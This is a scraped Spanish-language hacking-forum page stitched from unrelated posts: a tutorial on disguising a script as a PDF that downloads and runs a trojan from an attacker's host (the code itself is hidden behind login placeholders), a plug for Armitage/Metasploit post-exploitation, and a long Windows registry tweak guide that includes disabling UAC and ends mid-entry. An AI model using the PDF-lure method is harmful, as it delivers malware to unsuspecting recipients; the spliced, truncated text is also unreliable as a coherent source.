Por otra parte, quiero dar gracias a los nuevos seguidores de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y pedir perdón por la ausencia de entradas durante estos días pero es que estoy bastante ocupado últimamente!

Empezamos y requisitos:

• Un .exe para ejecutar(troyano, etc.)
  
• Un host, donde subiremos el .exe
  

Abrimos nuestro bloc de notas o bien si tienen You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (lo recomiendo) y pegamos el siguiente You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ahora nos toca retocar un par de cosas, la primera el texto que aparecerá al ejecutar el PDF. Se encuentra en esta parte del código, cada uno pone lo que desee.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La segunda es editar la url del host, donde estará el .exe a ejecutar. Pueden usar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login como host gratuito, yo usaré localhost....Como es normal el .exe que uso en este método y otros es el troyano You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Por ultimo, guardan todo el código con extensión .pdf

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vez guardado en .pdf, lo ejecuto para comprobar la funcionalidad del método explicado.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sean buenos con el uso del método!!




Jchiero

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Supongo que te refieres a entrar al PhpMyAdmin para poder descargar las tablas MySQL.

Cuando salió Armitage, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y eso fue hace más de un año... Hoy por hoy ésta herramienta, que hace aun más fácil y gráfico el uso de Metasploit, tiene muchas más utilidades y mejoras. Tiempo atrás se tenía que instalar manualmente para usarlo, hoy viene por defecto con MSF.


Es así que les quiero dejar un vídeo para que vean algunas de las nuevas características, y para que los que no lo conocen comiencen a familiarizarse con él.


En el vídeo se muestra 10 clientes obtenidos con Armitage después de la explotación de un servidor remoto, se ven diferentes funcionalidades de Armintage y al final del vídeo se muestra lo fácil que es la gestión de una base de datos con 5.000 hosts a través de esta aplicación.




Para más info pueden visitar la You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Selección de códigos para cambiar valores en el Registro de Windows y archivos REG para descargar gratis, todos ellos permiten modificar y agregar funciones útiles al sistema operativo.





En otros post dedicados al Registro de Windows, se pueden conocer diversas formas de modificar y agregar claves y valores usando REGEDIT, para personalizar el sistema.
En este artículo se agrupa una selección miscelánea, que no está incluida en ninguna de las otras páginas. Puede ser que aquí encuentres algo que te interese.
Se han ido agregando los códigos y también archivos REG. También puedes crear tus propios archivos REG, exportando las claves necesarias después de modificarlas, lo que permitirá guardarlas para agregarlas en otro momento con solo dos clics o compartirlas con algún amigo.
Cambiar valores del Registro para modificar funciones de Windows


Deshabilitar las notificaciones del Control de Cuentas de Usuario


El UAC o Control de Cuentas de Usuario, pensado para protegernos de aplicaciones perniciosas, es una de las funciones más criticada de Windows Vista y 7. La seguridad que aporta es relativa, pues sus cuadros de diálogos molestos acaban por ser un mero trámite.
Para deshabilitarlo tienes que acceder al la clave:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]


Allí si existen los siguientes valores DWORD, establécelos todos en 0:


EnableLUA
FilterAdministratorToken
EnableUIADesktopToggle
ConsentPromptBehaviorAdmin
ConsentPromptBehaviorUser
EnableInstallerDetection
ValidateAdminCodeSignatures
EnableSecureUIAPaths
PromptOnSecureDesktop
Para Añadir Programas que se Inicien con Windows:


Para permitir que programas o aplicaciones se inicien con Windows tienes que acceder una de las siguientes claves:
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]


Crear un nuevo valor de cadena, renombrarlo, y en el valor introducirle la ruta al ejecutable de la aplicación que quieres que se inicie.
Desinstalar programas directamente a través del registro


Para programas que no se encuentra el desinstalador o dan algún tipo de conflicto al tratar de desinstalarlos mediante la herramienta del Panel de control, debes acceder a la siguiente clave del registro:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall


En el listado de carpetas numeradas busca la que contiene el programa a desinstalar, dos clic en el valor UninstallString y el contenido pégalo en la ventana de la consola de comandos, si la carpeta aun continua en el registro elimínala.
Códigos para crear archivos REG y modificar el Registro


Los siguientes códigos puedes usarlos para guiarte y con su información, modificar manualmente las claves o también puedes crear con ellos un script o archivo REG.


Para poder crear un script o archivo REG con los siguientes códigos, cópialos y pégalos en el Bloc de notas.
Agrégale el siguiente encabezado: Windows Registry Editor Version 5.00.


A continuación debes de dejar despues del encabezado, una línea en blanco, quedaría de esta forma:



Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\*\shell]
[HKEY_CLASSES_ROOT\*\shell\open]
@="Abrir con el Bloc de Notas"
[HKEY_CLASSES_ROOT\*\shell\open\command]
@="notepad.exe %1″
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.]
"Application"="Notepad"



Ahora guarda el archivo creado con la extensión de archivo .reg.
Al dar dos clic y aceptar en la ventana de confirmación que aparece, la información se agrega al Registro.
De esa forma se evita tener que abrir el editor y modificar las claves manualmente y así puedes hacer tus propios scripts con los códigos que aparecen en esta página.
Abrir con el Bloc de notas los archivos sin extensión (Windows XP)
[HKEY_CLASSES_ROOT\*\shell]
[HKEY_CLASSES_ROOT\*\shell\open]
@="Abrir con el Bloc de Notas"
[HKEY_CLASSES_ROOT\*\shell\open\command]
@="notepad.exe %1″
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.]
"Application"="Notepad"


Abrir con el bloc de notas los archivos sin extensión (Windows Vista-7)
[HKEY_CLASSES_ROOT\Unknown\shell] 
@="notepad" 
[HKEY_CLASSES_ROOT\Unknown\shell\notepad] 
@="Abrir con el Bloc de Notas" 
[HKEY_CLASSES_ROOT\Unknown\shell\notepad\command] 
@="C:\\WINDOWS\\NOTEPAD.EXE %1″


Añadir a Windows XP la opción de Abrir la ubicación del archivo en el menú contextual.



Añadir la opción propia de Vista y Windows 7 de que al dar clic derecho en un acceso directo, en el menú contextual aparezca la opción de Abrir la ubicación del archivo.


[HKEY_CLASSES_ROOT\*\shell]
[HKEY_CLASSES_ROOT\*\shell\File Location]
@="Abrir la ubicacion del archivo"
[HKEY_CLASSES_ROOT\*\shell\File Location\command]
@="\"explorer.exe\" /select,\"%1\""



Para abrir una ventana de comandos con el clic derecho (Windows XP)
[HKEY_CLASSES_ROOT\Directory\shell\Abrir ventana de comandos aqui]
@="Command &Prompt Here"
[HKEY_CLASSES_ROOT\Directory\shell\Abrir ventana de comandos aqui\command]
@="cmd.exe /k cd %1 "


Deshabilitar y Habilitar los dispositivos USB
DESHABILITAR USB
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\USBSTOR]
"Start"=dword:00000004
HABILITAR USB
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\USBSTOR]
"Start"=dword:00000003

Borrar URL recientes en Internet Explorer
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs]
Deshabilitar el servicio de indexado (Windows XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cisvc]
"Start"=dword:00000004
Deshabilitar las librerias en Windows 7
[HKEY_CLASSES_ROOT\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder]
"Attributes"=dword:b090010d
Borrar el historial de iconos en el área de notificación


Borrar el historial de los iconos que ya no se utilizan pero aún se mantienen desmarcados en el área de notificación.
Para Windows Vista y 7
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify]
"PastIconsStream"=-
"IconStreams"=-


Para Windows XP
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify]
"PastIconsStream"=-
"IconStreams"=-


Aquí les dejo varias claves útiles:

AbrirBlocNotasArchivosSinExtensionVista7.reg



Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\Unknown\shell]
@="notepad"
[HKEY_CLASSES_ROOT\Unknown\shell\notepad]
@="Abrir con el Bloc de Notas"
[HKEY_CLASSES_ROOT\Unknown\shell\notepad\command]
@="C:\\WINDOWS\\NOTEPAD.EXE %1″


AbrirBlocNotasArchivosSinExtensionXP.reg


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\*\shell]


[HKEY_CLASSES_ROOT\*\shell\open]
@="Open With Notepad"


[HKEY_CLASSES_ROOT\*\shell\open\command]
@="notepad.exe %1″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.]
"Application"="Notepad"


Añada la opción de Abrir ubicación de Archivo en Windows XP.reg


Windows Registry Editor Version 5.00


 


[HKEY_CLASSES_ROOT\*\shell]


[HKEY_CLASSES_ROOT\*\shell\File Location]
@="Abrir la ubicacion del archivo"


[HKEY_CLASSES_ROOT\*\shell\File Location\command]
@="\"explorer.exe\" /select,\"%1\""


AgregarAbrirVentanaComandosClicDerechoXP.reg


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\Directory\shell\Abrir ventana de comandos aqui]
@="Command &Prompt Here"


[HKEY_CLASSES_ROOT\Directory\shell\Abrir ventana de comandos aqui\command]
@="cmd.exe /k cd %1 "


AgregarNotepadClicDerecho.reg


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad]
@="Notepad"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Notepad\command]
@="C:\\Windows\\notepad"


AgregarNuevoCorreoMenuContextualXP.reg


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\.eml]


[HKEY_CLASSES_ROOT\.eml\ShellNew]
"FileName"="Email.eml"


AgregarVaciarPapeleraClicDerechoXP.reg


Windows Registry Editor Version 5.00


[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\{645FF040-5081-101B-9F08-00AA002F954E}]
@="Empty Recycle Bin"


[HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Empty Recycle Bin]
@="{645FF040-5081-101B-9F08-00AA002F954E}"


[HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenuHandlers\Empty Recycle Bin]
@="{645FF040-5081-101B-9F08-00AA002F954E}"


[HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\Empty Recycle Bin]
@="{645FF040-5081-101B-9F08-00AA002F954E}"


[HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers\Empty Recycle Bin]
@="{645FF040-5081-101B-9F08-00AA002F954E}"


DeshabilitarServicioIndexXP.reg


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\cisvc]
"Start"=dword:00000004


EliminarArchivosTemporalesInternetSalir.reg


Windows Registry Editor Version 5.00


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache]
"Persistent"=dword:00000000


Quitar la opción de Abrir ubicación de Archivo en Windows XP.reg


Windows Registry Editor Version 5.00


[-HKEY_CLASSES_ROOT\*\shell\File Location]


RestaurarSonidosSistemaXP.reg


Windows Registry Editor Version 5.00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default]
@="Windows"
"DispFileName"="@mmsys.cpl,-5856″


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\.Default]


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\.Default\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,44,00,69,00,6e,00,67,00,2e,00,77,00,61,\
00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\.Default\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,44,00,69,00,6e,00,67,00,2e,00,77,00,61,\
00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\AppGPFault]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\AppGPFault\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\AppGPFault\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\CCSelect]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\CriticalBatteryAlarm]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\CriticalBatteryAlarm\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,74,00,74,00,65,00,72,00,79,\
00,20,00,43,00,72,00,69,00,74,00,69,00,63,00,61,00,6c,00,2e,00,77,00,61,00,\
76,00,00,00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\CriticalBatteryAlarm\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,74,00,74,00,65,00,72,00,79,\
00,20,00,43,00,72,00,69,00,74,00,69,00,63,00,61,00,6c,00,2e,00,77,00,61,00,\
76,00,00,00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceConnect]


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,49,00,6e,00,73,00,65,00,72,00,74,00,2e,00,77,00,61,00,76,00,\
00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,49,00,6e,00,73,00,65,00,72,00,74,00,2e,00,77,00,61,00,76,00,\
00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,52,00,65,00,6d,00,6f,00,76,00,65,00,2e,00,77,00,61,00,76,00,\
00,00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,52,00,65,00,6d,00,6f,00,76,00,65,00,2e,00,77,00,61,00,76,00,\
00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceFail]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceFail\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,46,00,61,00,69,00,6c,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceFail\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,48,00,61,00,72,00,64,00,77,00,61,00,72,\
00,65,00,20,00,46,00,61,00,69,00,6c,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\LowBatteryAlarm]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\LowBatteryAlarm\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,74,00,74,00,65,00,72,00,79,\
00,20,00,4c,00,6f,00,77,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\LowBatteryAlarm\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,74,00,74,00,65,00,72,00,79,\
00,20,00,4c,00,6f,00,77,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MailBeep]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MailBeep\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,4e,00,6f,00,74,00,69,00,66,00,79,00,2e,\
00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MailBeep\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,4e,00,6f,00,74,00,69,00,66,00,79,00,2e,\
00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Maximize]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Maximize\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Maximize\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuCommand]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuCommand\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuCommand\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuPopup]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuPopup\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\MenuPopup\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Minimize]


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Minimize\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Minimize\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\PrintComplete]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\PrintComplete\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\PrintComplete\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreDown]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreDown\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreDown\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreUp]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreUp\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\RestoreUp\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\ShowBand]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemAsterisk]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,45,00,72,00,72,00,6f,00,72,00,2e,00,77,\
00,61,00,76,00,00,00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,45,00,72,00,72,00,6f,00,72,00,2e,00,77,\
00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,45,00,78,00,63,00,6c,00,61,00,6d,00,61,\
00,74,00,69,00,6f,00,6e,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,45,00,78,00,63,00,6c,00,61,00,6d,00,61,\
00,74,00,69,00,6f,00,6e,00,2e,00,77,00,61,00,76,00,00,00


[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExit]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExit\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,\
00,6e,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExit\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,\
00,6e,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,43,00,72,00,69,00,74,00,69,00,63,00,61,\
00,6c,00,20,00,53,00,74,00,6f,00,70,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,43,00,72,00,69,00,74,00,69,00,63,00,61,\
00,6c,00,20,00,53,00,74,00,6f,00,70,00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemNotification]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemNotification\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,6c,00,6c,00,6f,00,6f,00,6e,\
00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemNotification\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,42,00,61,00,6c,00,6c,00,6f,00,6f,00,6e,\
00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemQuestion]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemQuestion\.Current]
@=""

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemQuestion\.Default]
@=hex(2):00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemStart]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemStart\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,53,00,74,00,61,00,72,00,74,00,75,00,70,\
00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemStart\.Default]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
77,00,73,00,20,00,58,00,50,00,20,00,53,00,74,00,61,00,72,00,74,00,75,00,70,\
00,2e,00,77,00,61,00,76,00,00,00

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogoff]

[HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\WindowsLogoff\.Current]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,6d,00,65,00,64,00,69,00,61,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,\
